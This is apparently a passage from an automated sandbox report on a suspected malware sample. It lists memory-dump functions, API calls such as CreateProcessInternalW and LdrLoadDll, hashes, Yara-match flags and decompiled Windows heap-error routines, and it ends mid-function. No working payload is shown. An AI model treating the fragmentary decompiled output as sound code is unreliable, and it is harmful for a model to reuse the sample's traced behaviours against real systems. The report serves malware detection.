                        • API String ID: 2994545307-0
                        • Opcode ID: e60f7c3c2bae7c52fa62b3da404d1e793efd2857042e38a49bd4b878ec93f64d
                        • Instruction ID: 2bf93f19d70ab5795a407ab9c99a2669b7d8c97a666c5f82569f04b33aee65a5
                        • Opcode Fuzzy Hash: e60f7c3c2bae7c52fa62b3da404d1e793efd2857042e38a49bd4b878ec93f64d
                        • Instruction Fuzzy Hash: 1890026A31300112D1807159544860B000597D1242F91D459A0005598DCD5589797361
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5aa944fb9e4a026c1a687482044a6c5ccfc43d52db13a86eae0e3e47086e4071
                        • Instruction ID: 6175cf2e50bb7d0adb37711347172b526373905a23310d0bd8bedd4a3d444870
                        • Opcode Fuzzy Hash: 5aa944fb9e4a026c1a687482044a6c5ccfc43d52db13a86eae0e3e47086e4071
                        • Instruction Fuzzy Hash: 6190027231114512D11061598444707000597D1241F51C455A0814598E8AD589A17162
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 08dafee0c1f8a57de469a2f41d227032ecc7d9742390a2c8cd4b98a30110fe7e
                        • Instruction ID: 0f25810a570f7419c2451b33f0137694504fbfdf5688bf2b2ab4cf61bbbb7775
                        • Opcode Fuzzy Hash: 08dafee0c1f8a57de469a2f41d227032ecc7d9742390a2c8cd4b98a30110fe7e
                        • Instruction Fuzzy Hash: 9E90027230100512D10065995448647000597E0341F51D055A5014595FCAA589A17171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b50a74f814530943ea30e6bcda0133be35ac1767d6d0474418d4ca1d1f657939
                        • Instruction ID: e5c6d74e666b3e30048e9b51c0804a605022b565d7cb8916987e0c4aea9823fb
                        • Opcode Fuzzy Hash: b50a74f814530943ea30e6bcda0133be35ac1767d6d0474418d4ca1d1f657939
                        • Instruction Fuzzy Hash: E99002A230200113410571594454617400A97E0241B51C065E10045D0EC96589A17165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f477fe62e0af22267a2030e5a16cbba96d544df9d28cb9929fc3b1e89223274d
                        • Instruction ID: eab4c8ac0f28caa9609bebc00f2b7054c59980d62c20076cc684d952b5b37849
                        • Opcode Fuzzy Hash: f477fe62e0af22267a2030e5a16cbba96d544df9d28cb9929fc3b1e89223274d
                        • Instruction Fuzzy Hash: 34900477311001130105F55D07445070047D7D53D1351C075F10055D0DDF71CD717171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A05D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00483AF8), ref: 0049A08D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: d8beb6b6719ddd87adbc40b0542f4f5e6f1fcec855d26c12b20d6147c604ab6a
                        • Instruction ID: 6c71cac3295db1c21611e6d3524a7e067895cea548aab3fbb5bd63ebae0cbe5b
                        • Opcode Fuzzy Hash: d8beb6b6719ddd87adbc40b0542f4f5e6f1fcec855d26c12b20d6147c604ab6a
                        • Instruction Fuzzy Hash: 8EE04FB12006056FDB14DFA9CC49EE77BA9EF88350F114659FD1C97251C631E910CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00483AF8), ref: 0049A08D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: 4b9444c18e4bdfdbc0ac2fbe0ded8c38104e75f03d573d57517faeb62e1c7856
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: 55E012B1200208ABDB18EF99CC49EA77BACAF88750F018559BE185B242C630E9108AF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(004944F6,?,?,oLI,?,004944F6,?,?,?,?,?,00000000,00000000,?), ref: 0049A04D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: oLI
                        • API String ID: 1279760036-4010191922
                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction ID: 3b4ff9c5d8df61aa8d997f38a41d60fc4fc5dbf67c4e10c530d92334df34c8e5
                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction Fuzzy Hash: 4DE012B1200208ABDB14EF99CC41EA77BACAF88654F118559BE185B242C630F9108AF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0048834A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0048836B
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                        • Instruction ID: c1bbcc32430a91a97c3c87409e08d27e23c2d73badbe2889df0539698d0f1fb8
                        • Opcode Fuzzy Hash: 82079f10d3c2bb338251c77b1746ba6aed9656e107e48eb6c4cfa7d71c1448a4
                        • Instruction Fuzzy Hash: 5B018831A802187AEB20B6959C43FBF765C6B40F54F04451EFF04BA1C2D6D9690547E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0048ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0048AD32
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction ID: ac5a3d024dd7395d1c198af0ad605604bd88ace6b87a77ce980b25db59ca03f4
                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                        • Instruction Fuzzy Hash: C30152B5D0020DA7DF10EBA5DC42F9EB7B89B54308F0045A6A90897241F674EB14C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0049A124
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 186d7c20a6cd15e21b9b4a3c85140b5ed0bc367c30ae921e4a7072e7ea458b22
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: DC01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: f9e5db37abc0aaae2677b216b1c2f9b48515c5aac8e031180897d11d523684af
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 57E01AB12002086BDB10DF49CC85EE737ADAF89650F018565BE0C57241C934E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A1BB, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6822cbe0780f4165a37d3c6cb5f31b58303dc102fcf58aad1fb7f3e3adb1db1f
                        • Instruction ID: 8eab57edbbd046f5430d0f9c08448e6487381265c93c2f4c556e0b181a5c917d
                        • Opcode Fuzzy Hash: 6822cbe0780f4165a37d3c6cb5f31b58303dc102fcf58aad1fb7f3e3adb1db1f
                        • Instruction Fuzzy Hash: FEE04FB56002046FDB10DF45DC86EE777A9EF89750F018565FE4C5B242D934E9108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0049A1B1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 65e0494bec39a1f6fea73c8969ee90dd77cf6c9ceb3f3963c882282482821b57
                        • Instruction ID: 35ccb0a8b7894abf5434b7cd2584513c7b69b746a121b91d9a49510df3e5ddbd
                        • Opcode Fuzzy Hash: 65e0494bec39a1f6fea73c8969ee90dd77cf6c9ceb3f3963c882282482821b57
                        • Instruction Fuzzy Hash: 6EE09AB02082502BCB10DB258C82E9B3FA8EF89260F1885A9FC8817202C538A42487F5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0048F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00488CF4,?), ref: 0048F6BB
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                        • Instruction ID: 415c86087b103a290d44c69c3ec54f8d32621617745fc3c699d5297c1b878bed
                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                        • Instruction Fuzzy Hash: 85D0A7727903043BEA10FAA5DC03F2732CC6B44B04F490474F948EB3C3E954E4014169
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 78d748ca63b50c93eba9a8d4ff7d20b15ef138933d4ea49d32b59b90b87411f3
                        • Instruction ID: 56c531700f88d12d4fe070645641a46b26482cdb29d1eb6c1990049a83ba177e
                        • Opcode Fuzzy Hash: 78d748ca63b50c93eba9a8d4ff7d20b15ef138933d4ea49d32b59b90b87411f3
                        • Instruction Fuzzy Hash: 25B09B729064C5D5D711D76046087177904B7D0741F16C095D1020681B4778D191F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 02BAB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                        Download Yara Rule
                        Strings
                        • This failed because of error %Ix., xrefs: 02BAB446
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02BAB47D
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02BAB39B
                        • *** enter .cxr %p for the context, xrefs: 02BAB50D
                        • *** enter .exr %p for the exception record, xrefs: 02BAB4F1
                        • an invalid address, %p, xrefs: 02BAB4CF
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02BAB305
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02BAB53F
                        • Go determine why that thread has not released the critical section., xrefs: 02BAB3C5
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02BAB484
                        • a NULL pointer, xrefs: 02BAB4E0
                        • The instruction at %p tried to %s , xrefs: 02BAB4B6
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02BAB323
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02BAB2DC
                        • The instruction at %p referenced memory at %p., xrefs: 02BAB432
                        • The resource is owned exclusively by thread %p, xrefs: 02BAB374
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02BAB476
                        • *** An Access Violation occurred in %ws:%s, xrefs: 02BAB48F
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02BAB38F
                        • <unknown>, xrefs: 02BAB27E, 02BAB2D1, 02BAB350, 02BAB399, 02BAB417, 02BAB48E
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 02BAB352
                        • The critical section is owned by thread %p., xrefs: 02BAB3B9
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02BAB314
                        • The resource is owned shared by %d threads, xrefs: 02BAB37E
                        • write to, xrefs: 02BAB4A6
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02BAB2F3
                        • *** then kb to get the faulting stack, xrefs: 02BAB51C
                        • read from, xrefs: 02BAB4AD, 02BAB4B2
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02BAB3D6
                        • *** Inpage error in %ws:%s, xrefs: 02BAB418
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 06a768cd34845b52bc465991ca5c16d77f95b0df03c04f9593a7632b638f53ef
                        • Instruction ID: f4ad7af12d183902253eaf10b97fb0d616d80ab947eba8dec392afb18658a0f9
                        • Opcode Fuzzy Hash: 06a768cd34845b52bc465991ca5c16d77f95b0df03c04f9593a7632b638f53ef
                        • Instruction Fuzzy Hash: 0E812635A04200FFEF31AA058CA5E7B3B2AEF66B59F4580C5F51B2B112DB618552CB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E02BB1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x2ad48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02AFB150();
				} else {
					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x2be589c);
				E02AFB150("Heap error detected at %p (heap handle %p)\n",  *0x2be58a0);
				_t27 =  *0x2be5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M02BB1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02AFB150();
				} else {
					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E02AFB150("Error code: %d - %s\n",  *0x2be5898);
				_t113 =  *0x2be58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02AFB150();
					} else {
						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02AFB150("Parameter1: %p\n",  *0x2be58a4);
				}
				_t115 =  *0x2be58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02AFB150();
					} else {
						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02AFB150("Parameter2: %p\n",  *0x2be58a8);
				}
				_t117 =  *0x2be58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02AFB150();
					} else {
						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02AFB150("Parameter3: %p\n",  *0x2be58ac);
				}
				_t119 =  *0x2be58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02AFB150();
					} else {
						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x2be58b4);
					E02AFB150("Last known valid blocks: before - %p, after - %p\n",  *0x2be58b0);
				} else {
					_t120 =  *0x2be58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02AFB150();
				} else {
					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E02AFB150("Stack trace available at %p\n", 0x2be58c0);
			}











                        0x02bb1c10
                        0x02bb1c16
                        0x02bb1c1e
                        0x02bb1c3d
                        0x02bb1c3e
                        0x02bb1c20
                        0x02bb1c35
                        0x02bb1c3a
                        0x02bb1c44
                        0x02bb1c55
                        0x02bb1c5a
                        0x02bb1c65
                        0x02bb1c67
                        0x00000000
                        0x02bb1c6e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bb1c67
                        0x02bb1cdc
                        0x02bb1ce5
                        0x02bb1d04
                        0x02bb1d05
                        0x02bb1ce7
                        0x02bb1cfc
                        0x02bb1d01
                        0x02bb1d0b
                        0x02bb1d17
                        0x02bb1d1f
                        0x02bb1d25
                        0x02bb1d30
                        0x02bb1d4f
                        0x02bb1d50
                        0x02bb1d32
                        0x02bb1d47
                        0x02bb1d4c
                        0x02bb1d61
                        0x02bb1d67
                        0x02bb1d68
                        0x02bb1d6e
                        0x02bb1d79
                        0x02bb1d98
                        0x02bb1d99
                        0x02bb1d7b
                        0x02bb1d90
                        0x02bb1d95
                        0x02bb1daa
                        0x02bb1db0
                        0x02bb1db1
                        0x02bb1db7
                        0x02bb1dc2
                        0x02bb1de1
                        0x02bb1de2
                        0x02bb1dc4
                        0x02bb1dd9
                        0x02bb1dde
                        0x02bb1df3
                        0x02bb1df9
                        0x02bb1dfa
                        0x02bb1e00
                        0x02bb1e0a
                        0x02bb1e13
                        0x02bb1e32
                        0x02bb1e33
                        0x02bb1e15
                        0x02bb1e2a
                        0x02bb1e2f
                        0x02bb1e39
                        0x02bb1e4a
                        0x02bb1e02
                        0x02bb1e02
                        0x02bb1e08
                        0x00000000
                        0x00000000
                        0x02bb1e08
                        0x02bb1e5b
                        0x02bb1e7a
                        0x02bb1e7b
                        0x02bb1e5d
                        0x02bb1e72
                        0x02bb1e77
                        0x02bb1e95

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: 282c068389a5cc83da3f0629836d2531c52c3a6f3464fcbd0fece55c301d8bbd
                        • Instruction ID: d1da4f0e58990579fb4bd57f18f1153173484c9122e910833a67ec76eeb050f3
                        • Opcode Fuzzy Hash: 282c068389a5cc83da3f0629836d2531c52c3a6f3464fcbd0fece55c301d8bbd
                        • Instruction Fuzzy Hash: D16126369A1144DFDA52DB88D694D3173B5EF08A35B0984AAF50F5F312CFB89841CF29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B03D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E02B03D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E02B01B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
